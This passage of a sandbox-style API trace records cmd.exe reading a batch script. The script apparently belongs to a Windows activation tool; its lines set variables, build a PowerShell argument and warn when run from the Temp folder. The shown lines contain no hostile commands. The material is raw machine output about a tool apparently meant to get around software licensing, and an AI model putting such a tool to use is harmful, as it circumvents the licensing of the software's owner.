hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.439] SetFilePointer (in: hFile=0xac, lDistanceToMove=4606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0176.439] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if \"%_work:~-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\n", cbMultiByte=49, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if \"%_work:~-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\ne\r\n") returned 49 [0176.440] _get_osfhandle (_FileHandle=3) returned 0xac [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0176.440] _get_osfhandle (_FileHandle=3) returned 0xac [0176.440] GetFileType (hFile=0xac) returned 0x1 [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11fe [0176.440] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=4608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0176.440] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n \"%_work:~-1%\"==\"\\\" set \"_work=%_work:~0,-1%\"\r\n") returned 2 [0176.440] _get_osfhandle (_FileHandle=3) returned 0xac [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0176.440] _get_osfhandle (_FileHandle=3) returned 0xac [0176.440] GetFileType (hFile=0xac) returned 0x1 [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1200 [0176.440] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=4626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0176.440] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_batf=%~f0\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_batf=%~f0\"\r\n\"\\\" set \"_work=%_work:~0,-1%\"\r\n") returned 18 [0176.440] _get_osfhandle (_FileHandle=3) returned 0xac [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0176.440] _get_osfhandle (_FileHandle=3) returned 0xac [0176.440] GetFileType (hFile=0xac) returned 0x1 [0176.440] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1212 [0176.440] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=4652, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0176.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_batp=%_batf:'=''%\"\r\n", cbMultiByte=26, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_batp=%_batf:'=''%\"\r\n\"_work=%_work:~0,-1%\"\r\n") returned 26 [0176.441] _get_osfhandle (_FileHandle=3) returned 0xac [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0176.441] _get_osfhandle (_FileHandle=3) returned 0xac [0176.441] GetFileType (hFile=0xac) returned 0x1 [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122c [0176.441] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=4654, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0176.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt \"_batp=%_batf:'=''%\"\r\n") returned 2 [0176.441] _get_osfhandle (_FileHandle=3) returned 0xac [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0176.441] _get_osfhandle (_FileHandle=3) returned 0xac [0176.441] GetFileType (hFile=0xac) returned 0x1 [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x122e [0176.441] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=4689, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0176.441] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _PSarg=\"\"\"%~f0\"\"\" -el %_args%\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _PSarg=\"\"\"%~f0\"\"\" -el %_args%\r\nwork:~0,-1%\"\r\n") returned 35 [0176.441] _get_osfhandle (_FileHandle=3) returned 0xac [0176.441] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0176.441] _get_osfhandle (_FileHandle=3) returned 0xac [0176.441] GetFileType (hFile=0xac) returned 0x1 [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1251 [0176.442] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=4691, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0176.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _PSarg=\"\"\"%~f0\"\"\" -el %_args%\r\n") returned 2 [0176.442] _get_osfhandle (_FileHandle=3) returned 0xac [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0176.442] _get_osfhandle (_FileHandle=3) returned 0xac [0176.442] GetFileType (hFile=0xac) returned 0x1 [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1253 [0176.442] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=4738, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0176.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_ttemp=%userprofile%\\AppData\\Local\\Temp\"\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_ttemp=%userprofile%\\AppData\\Local\\Temp\"\r\n\r\n") returned 47 [0176.442] _get_osfhandle (_FileHandle=3) returned 0xac [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0176.442] _get_osfhandle (_FileHandle=3) returned 0xac [0176.442] GetFileType (hFile=0xac) returned 0x1 [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1282 [0176.442] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=4740, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0176.442] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt \"_ttemp=%userprofile%\\AppData\\Local\\Temp\"\r\n") returned 2 [0176.442] _get_osfhandle (_FileHandle=3) returned 0xac [0176.442] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0176.443] _get_osfhandle (_FileHandle=3) returned 0xac [0176.443] GetFileType (hFile=0xac) returned 0x1 [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1284 [0176.443] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=4773, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0176.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal EnableDelayedExpansion\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="setlocal EnableDelayedExpansion\r\n\\Local\\Temp\"\r\n") returned 33 [0176.443] _get_osfhandle (_FileHandle=3) returned 0xac [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0176.443] _get_osfhandle (_FileHandle=3) returned 0xac [0176.443] GetFileType (hFile=0xac) returned 0x1 [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a5 [0176.443] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=4775, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0176.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\ntlocal EnableDelayedExpansion\r\n") returned 2 [0176.443] _get_osfhandle (_FileHandle=3) returned 0xac [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0176.443] _get_osfhandle (_FileHandle=3) returned 0xac [0176.443] GetFileType (hFile=0xac) returned 0x1 [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12a7 [0176.443] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.443] SetFilePointer (in: hFile=0xac, lDistanceToMove=4915, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0176.443] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0176.444] _wcsicmp (_String1="_colorprep", _String2="") returned 95 [0176.444] _get_osfhandle (_FileHandle=3) returned 0xac [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0176.444] _get_osfhandle (_FileHandle=3) returned 0xac [0176.444] GetFileType (hFile=0xac) returned 0x1 [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1333 [0176.444] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=4917, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0176.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0176.444] _get_osfhandle (_FileHandle=3) returned 0xac [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0176.444] _get_osfhandle (_FileHandle=3) returned 0xac [0176.444] GetFileType (hFile=0xac) returned 0x1 [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1335 [0176.444] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=4966, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1366 [0176.444] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo \"!_batf!\" | find /i \"!_ttemp!\" %nul1% && (\r\n", cbMultiByte=49, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo \"!_batf!\" | find /i \"!_ttemp!\" %nul1% && (\r\n=========================================================================================\r\n") returned 49 [0176.444] _get_osfhandle (_FileHandle=3) returned 0xac [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1366 [0176.444] _get_osfhandle (_FileHandle=3) returned 0xac [0176.444] GetFileType (hFile=0xac) returned 0x1 [0176.444] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1366 [0176.445] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=5001, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1389 [0176.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i not \"!_work!\"==\"!_ttemp!\" (\r\n", cbMultiByte=35, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if /i not \"!_work!\"==\"!_ttemp!\" (\r\n %nul1% && (\r\n") returned 35 [0176.445] _get_osfhandle (_FileHandle=3) returned 0xac [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1389 [0176.445] _get_osfhandle (_FileHandle=3) returned 0xac [0176.445] GetFileType (hFile=0xac) returned 0x1 [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1389 [0176.445] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=5012, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1394 [0176.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%nceline%\r\n", cbMultiByte=11, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%nceline%\r\n!_work!\"==\"!_ttemp!\" (\r\n") returned 11 [0176.445] _get_osfhandle (_FileHandle=3) returned 0xac [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1394 [0176.445] _get_osfhandle (_FileHandle=3) returned 0xac [0176.445] GetFileType (hFile=0xac) returned 0x1 [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1394 [0176.445] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=5059, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13c3 [0176.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Script is launched from the temp folder,\r\n", cbMultiByte=47, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Script is launched from the temp folder,\r\n\r\n") returned 47 [0176.445] _get_osfhandle (_FileHandle=3) returned 0xac [0176.445] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13c3 [0176.445] _get_osfhandle (_FileHandle=3) returned 0xac [0176.445] GetFileType (hFile=0xac) returned 0x1 [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13c3 [0176.446] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=5136, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1410 [0176.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Most likely you are running the script directly from the archive file.\r\n", cbMultiByte=77, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Most likely you are running the script directly from the archive file.\r\n=============================================================\r\n") returned 77 [0176.446] _get_osfhandle (_FileHandle=3) returned 0xac [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1410 [0176.446] _get_osfhandle (_FileHandle=3) returned 0xac [0176.446] GetFileType (hFile=0xac) returned 0x1 [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1410 [0176.446] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=5143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1417 [0176.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\nst likely you are running the script directly from the archive file.\r\n") returned 7 [0176.446] _get_osfhandle (_FileHandle=3) returned 0xac [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1417 [0176.446] _get_osfhandle (_FileHandle=3) returned 0xac [0176.446] GetFileType (hFile=0xac) returned 0x1 [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1417 [0176.446] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=5223, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1467 [0176.446] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Extract the archive file and launch the script from the extracted folder.\r\n", cbMultiByte=80, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Extract the archive file and launch the script from the extracted folder.\r\n==========================================================\r\n") returned 80 [0176.446] _get_osfhandle (_FileHandle=3) returned 0xac [0176.446] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1467 [0176.447] _get_osfhandle (_FileHandle=3) returned 0xac [0176.447] GetFileType (hFile=0xac) returned 0x1 [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1467 [0176.447] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=5236, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1474 [0176.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto MASend\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto MASend\r\nthe archive file and launch the script from the extracted folder.\r\n") returned 13 [0176.447] _get_osfhandle (_FileHandle=3) returned 0xac [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1474 [0176.447] _get_osfhandle (_FileHandle=3) returned 0xac [0176.447] GetFileType (hFile=0xac) returned 0x1 [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1474 [0176.447] ReadFile (in: hFile=0xac, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0176.447] SetFilePointer (in: hFile=0xac, lDistanceToMove=5239, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1477 [0176.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no MASend\r\n") returned 3 [0176.447] _get_osfhandle (_FileHandle=3) returned 0xac [0176.447] SetFilePointer (in: 